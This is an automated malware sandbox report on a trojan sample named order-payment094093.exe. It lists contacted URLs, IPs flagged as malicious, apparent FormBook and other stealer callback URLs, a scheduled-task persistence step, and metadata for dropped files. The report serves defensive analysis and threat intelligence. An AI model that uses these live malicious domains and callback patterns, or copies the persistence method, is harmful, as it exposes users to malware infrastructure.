https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.com-	explorer.exe, 0000000A.00000000.2151506615.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330512018.000000000C072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979706024.000000000C06D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.sparkfirestarter.netReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	order-payment094093.exe, NFOLsr.exe.0.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kathrynmirabella.com/hd05/www.vagabondtracks.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lovepox.com/hd05/	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vagabondtracks.com/hd05/	explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.7727.info/hd05/www.uniqueofferss.com	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comEMd	explorer.exe, 0000000A.00000000.2151506615.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3330304405.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dropshunter.netReferer:	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuskerlogix.com/hd05/www.businessjp6-51399.info	explorer.exe, 0000000A.00000002.3331563460.000000000C4EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979453407.000000000C51F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3074872871.000000000C51F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 0000000A.00000003.3076686621.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3321626771.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.188.223	ssl1.prod.systemdragon.com	United States	13335	CLOUDFLARENETUS	true
15.197.142.173	stmbbill.com	United States	7430	TANDEMUS	true
192.64.119.254	www.stairs.parts	United States	22612	NAMECHEAP-NETUS	true
3.33.130.190	tuskerlogix.com	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1437996
Start date and time:	2024-05-08 09:38:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	order-payment094093.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@538/15@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 125 Number of non-executed functions: 326
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:39:40	API Interceptor	1x Sleep call for process: order-payment094093.exe modified
09:39:47	API Interceptor	36x Sleep call for process: powershell.exe modified
09:39:49	Task Scheduler	Run new task: NFOLsr path: C:\Users\user\AppData\Roaming\NFOLsr.exe
09:39:50	API Interceptor	1x Sleep call for process: NFOLsr.exe modified
09:40:01	API Interceptor	3254424x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
15.197.142.173	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	www.multipli.com.au/
	LF2024022.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.hynasty.com/jn17/?Yxl0T=CPqtRfop&AjFxkn=4Z4u4b/qbn8Cou130t2H8xJ/sJoxTKoGByavsKrQBINpDrKHw6qvpsqL/DJvGOId8VRk
	JJUmnnkIxSCyKik.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.3051harborview.com/be03/?rTBtDp=suXbCTXU92ovHdaIXb7R9YYK1IkwIgSOp0dXqB8UbR93uWifCA/K/xk40N7Mr35M0Xbq&N2MtQP=A0D4vjHhyTdpNr2p
	http://www.creativeconcretend.com/	Get hash	malicious	Unknown	Browse	www.creativeconcretend.com/
	http://FrontierDermatology.com	Get hash	malicious	Unknown	Browse	frontierdermatology.com/favicon.ico
	Inquiry Second Reminder.exe	Get hash	malicious	FormBook	Browse	www.quickfinancebrokerage.com/dz25/?9rz0r6F8=CoMy9fI8EEZFQk9jtt/Un0HLWQ4rszorgc8lEDg7Ran8sXpCUnFPgm6FbRN/YzK+x3/l&RP=7nHTxl6
	4V457bAGOD.exe	Get hash	malicious	FormBook	Browse	www.rutgersorthopedics.com/kh11/?iBZ0=2dwhbDAPrRNxsv5&pFN4PFR=Iip38xbzW4Vl0cZT3E/lr35AfwmEn4iBqZL8fJqzX17FY9279t6Q8c1Vq7Nq0goNBlRrayBJwA==
	bnY2j1hTDlb4vxF.exe	Get hash	malicious	FormBook	Browse	www.maxhealthunity.com/ns03/?PpHd=6xy0BlzpHoW5nGBYZh1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3uJ3TZNmsu&5jRh=8pz4F2e0
	BjPoJrAfGLAxsAS.exe	Get hash	malicious	FormBook	Browse	www.maxhealthunity.com/ns03/?P2J=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4GzjcbtVHfhAHR4zS/1ug==&KvClV=Abf830Op1j0d5X80
	duGqHKp0OUXaX1D.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.maxhealthunity.com/ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj
192.64.119.254	http://www.malwaredomainlist.com/	Get hash	malicious	Unknown	Browse	www.malwaredomainlist.com/
	http://Tw1tter.com/Dionspizza	Get hash	malicious	Unknown	Browse	tw1tter.com/Dionspizza
	PI_and_payment_confirmed_pdf.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.thebestsocialcrm.com/n7ak/
	rock990ro0.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.mintkeysolutions.com/r08c/?EDH=O9LXEgeB07RmNCGSma1oL3FJiyxmJwHUiNgoqbch6cPrN2R74BimKmDdvEn1hcDu5w07&0VNTa2=zRipo8OXZt
	7LCsfHZ06y.exe	Get hash	malicious	FormBook	Browse	www.gotothe.bar/xy18/?UtS4=J4Slhvn8&WPgLsjUp=Eixmx8jRXLc2PXBsyuC13MCUE5OW/M+jsUjtzaU3pqJEO6ZJw6F8a8hCAI3cZWmyTSBK
	http://freesubmission.12com.xyz/	Get hash	malicious	Unknown	Browse	freesubmission.12com.xyz/
	http://freewebsitesubmission.12com.xyz/	Get hash	malicious	Unknown	Browse	freewebsitesubmission.12com.xyz/
	http://freewebsitesubmission.12com.xyz/	Get hash	malicious	Unknown	Browse	freewebsitesubmission.12com.xyz/
	0034524600927.exe	Get hash	malicious	FormBook	Browse	www.campingshare.net/uj3c/?A4CH5=/GNcMgI/ibfinprRym8Jvp8DQfWbItOgruH/4I6MurMpJU+j9Qz5iLMv1i7ijlo+TIn/&6l-=6lV4spO
	Yeni_sifaris.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.campingshare.net/uj3c/?U8a4=/GNcMgI/ibfinprRym8Jvp8DQfWbItOgruH/4I6MurMpJU+j9Qz5iLMv1i7I8VY+XKv/&TlKdV=GFNl7zHpKN-0kb
3.33.130.190	Inv 070324.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.isitbedtime.org/f8eq/
	Order4500318042.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sleepbetter.health/ht3d/?bxlp=EZX8hdZX80z0rph&Mtx4gxQ=6VTkJFEiq4kMx/RHnq0nrDsJPMBWXqjd9tBG2J6VBqqbMpJ+kC+NTTYHHG7NbPg+fCDV4A==
	shipping doc.exe	Get hash	malicious	FormBook	Browse	www.thesiamesebetta.biz/ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD
	Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exe	Get hash	malicious	FormBook	Browse	www.00047.vip/se63/?ehr=rYfWuT468Tc67hNM/0Jf+cRzLkrsF889ztcgHk2AEoSHsKvkCcFa8Ph0/RVXDGgWSBfyKpA9WA==&pRxXAB=mnRtohcx_FWp
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.threesomeapps.com/s8o3/
	TC0931AC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.hkcourierservices.com/mx21/?UL3=omEgru09F34AIVAZg08j9nWwl2FUuiKdYNv8jfEUaG21qWN+q7eeq3g6/ZtaAOBd3nbZti8bqg==&oVMD3d=5jo4nFWXh2Rd
	Om15eLtJ8qVFiGX.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.socialsellingbootcamp.com/be03/?gJ=v9/4xBjpEmtxmChP15JsWzyWO5iSZfjgxlg0WZCAYXTEp3bt55e4GncM0DjAilBNXjvD&mtxtA=MZHHPRnx
	NHhH776.exe	Get hash	malicious	FormBook	Browse	www.paulspopup.com/ve3w/
	Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exe	Get hash	malicious	FormBook	Browse	www.bbest6.com/se62/?E81=O2JdWDzPe&OXa=hxdRAfG23lTLRsFdMBMC+omEXZ6nXG0ITBWhV1OKh4MCSuWMfs7+VQy/sJuxcSO5dUfI
	LF2024022.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.manegociation.com/jn17/?AjFxkn=bG9FgDKDvwH5ouhJMsEJKp0Vwtplc1temHTMSZz+Sa+xDrZG8p1lHwoqMThHR6DqDyng&R8=IzuxIh6

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ssl1.prod.systemdragon.com	SecuriteInfo.com.FileRepMalware.16340.31219.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.17.158.1
	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
	wLlREXsA9M.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	sOjxIU25DP.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	hi38VYWujz.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	Payment_document.docx.doc	Get hash	malicious	FormBook	Browse	104.17.158.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	PO_3534272.exe	Get hash	malicious	FormBook	Browse	104.17.157.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZONEXPANSIONGB	https://global-lottery.weebly.com/directors.html	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://url.us.m.mimecastprotect.com/s/FY0hCPNp42s1rx35tzam0J?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://help.nextiva.com/0D5UV00000CENsy?fromEmail=1&s1oid=00D4x0000024KeV&s1nid=0DB8Y0000001q0j&s1uid=005UV000000Gbt2&s1ext=0&emkind=chatterPostNotification&emtm=1715035203355&emvtk=xliOiy4JGvwIBQw.4ViBLNixLC3jvtIl_ydu19EzVXQ%3D&OpenCommentForEdit=1	Get hash	malicious	Unknown	Browse	52.223.22.214
	http://46.8.8.100	Get hash	malicious	Unknown	Browse	52.223.43.160
	https://url.us.m.mimecastprotect.com/s/17YMCXDA4jsPyAwJs6MDCV?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	52.223.40.198
	Inv 070324.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	3.33.130.190
	Condition-Agreement_2024_05_06_35.lnk	Get hash	malicious	BumbleBee	Browse	3.33.244.179
	http://hrd-resources.hcamag.com//free/w_rewa15/prgm.cgi?a=1&utm_medium=email&_hsenc=p2ANqtz--HfLqrQmFFsVvuE58ldJaJQ95pGvtQN8iTFJ6icORv_iGUCsTZIZtf_IC7CLk44CCz2MNlE562S9HkiWR1dz6weE0B0h9aXgMDXF_Eep-gAHTpUbI&_hsmi=305448294&utm_content=305448294&utm_source=hs_email	Get hash	malicious	Unknown	Browse	52.223.40.198
	IrRNGfAWLp.elf	Get hash	malicious	Mirai	Browse	160.1.114.61
	Chrome.exe	Get hash	malicious	BumbleBee	Browse	3.33.244.179
NAMECHEAP-NETUS	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	198.54.122.136
	https://virology-renewableenergy.4f1a9c6d3bb34e17fd28a39e.workers.dev/SqrZAnOXIymdZkH3vYeAU4R9Y018pzbHz177148-sfmaxgen-pgx--ifxJuntageneralalba-isxcorporacionalba.essf-1MC4x	Get hash	malicious	HTMLPhisher	Browse	198.54.115.71
	https://url.us.m.mimecastprotect.com/s/17YMCXDA4jsPyAwJs6MDCV?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	198.54.116.140
	0aqSe4vyMqZVEQT.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.64.118.23
	PI-100957-pdf.exe	Get hash	malicious	AgentTesla	Browse	192.64.118.23
	https://stainlesseu.documentfilesoffices.top	Get hash	malicious	HTMLPhisher	Browse	198.54.115.171
	OSL332C-HBLx#U180es#U180el#U180ex#U180e..exe	Get hash	malicious	FormBook	Browse	198.54.117.242
	PI- 8945001-5-3-2024-pdf.exe	Get hash	malicious	AgentTesla	Browse	192.64.118.23
	https://docfilsxviews.webflow.io/	Get hash	malicious	Unknown	Browse	199.188.206.6
	Payment Advice MT1034354.exe	Get hash	malicious	FormBook, GuLoader	Browse	63.250.43.146
CLOUDFLARENETUS	Swift Copy_HSBC Bank_pdf.bat.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Pepsico RFQ_P1005712.xls	Get hash	malicious	GuLoader	Browse	172.67.170.209
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	y4UgZYdag6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.185.34
	https://u33127076.ct.sendgrid.net/ls/click?upn=u001.Dd8nu0w4qSl621Cfl5NzldfyZqjD9RWJslL2MWwt7pDZEhaAcTHbAT3eWd4fAnA0vrf6npFQIFebeFGCrAnwiA-3D-3DfmjQ_R-2Flyyz82d9aOYqi4-2FHSXVn4q8KaU22YObPyTKvaTTvltLHJTsQx6vicSpweVOt1Q2PhJWPHHTxt6yAPEzhfNUDUG5D5ilhJHkL1NI-2BWX2-2BDDI93AOg7LpunA0BU-2BZBoDgn6A5Z8xcvffpNwXtypTCusIOi-2BlO0xNH4h8I6EM-2FpelF-2BaCcmwOfdvxekMe-2FJpx-2B7DaCkmWjXbM0S7yd7UfMQ-3D-3D	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://url.us.m.mimecastprotect.com/s/NqNQClYX45S1PxGimFEoZ?domain=urldefense.proofpoint.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	http://rheodata.com	Get hash	malicious	Unknown	Browse	172.67.185.53
	https://flow.page/dnjetsdocs	Get hash	malicious	Unknown	Browse	104.18.125.91
	POX17265XSCB.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
TANDEMUS	https://url.us.m.mimecastprotect.com/s/FY0hCPNp42s1rx35tzam0J?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://hrd-resources.hcamag.com//free/w_rewa15/prgm.cgi?a=1&utm_medium=email&_hsenc=p2ANqtz--HfLqrQmFFsVvuE58ldJaJQ95pGvtQN8iTFJ6icORv_iGUCsTZIZtf_IC7CLk44CCz2MNlE562S9HkiWR1dz6weE0B0h9aXgMDXF_Eep-gAHTpUbI&_hsmi=305448294&utm_content=305448294&utm_source=hs_email	Get hash	malicious	Unknown	Browse	15.197.193.217
	PAYROLL.doc	Get hash	malicious	FormBook	Browse	15.197.130.221
	https://wywljs.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://www.multipli.com.au	Get hash	malicious	Unknown	Browse	15.197.142.173
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	15.197.142.173
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	15.197.143.135
	https://wywljs.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://goofle.com	Get hash	malicious	Unknown	Browse	15.197.224.234
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	15.197.130.221

Process:	C:\Users\user\AppData\Roaming\NFOLsr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order-payment094093.exe.log

Download File

Process:	C:\Users\user\Desktop\order-payment094093.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380192968514367
Encrypted:	false
SSDEEP:	48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
MD5:	E3EC01FAB7E327602A9550342FA73464
SHA1:	7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
SHA-256:	4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
SHA-512:	B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3beuwe4e.cac.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50etzmgc.mrp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

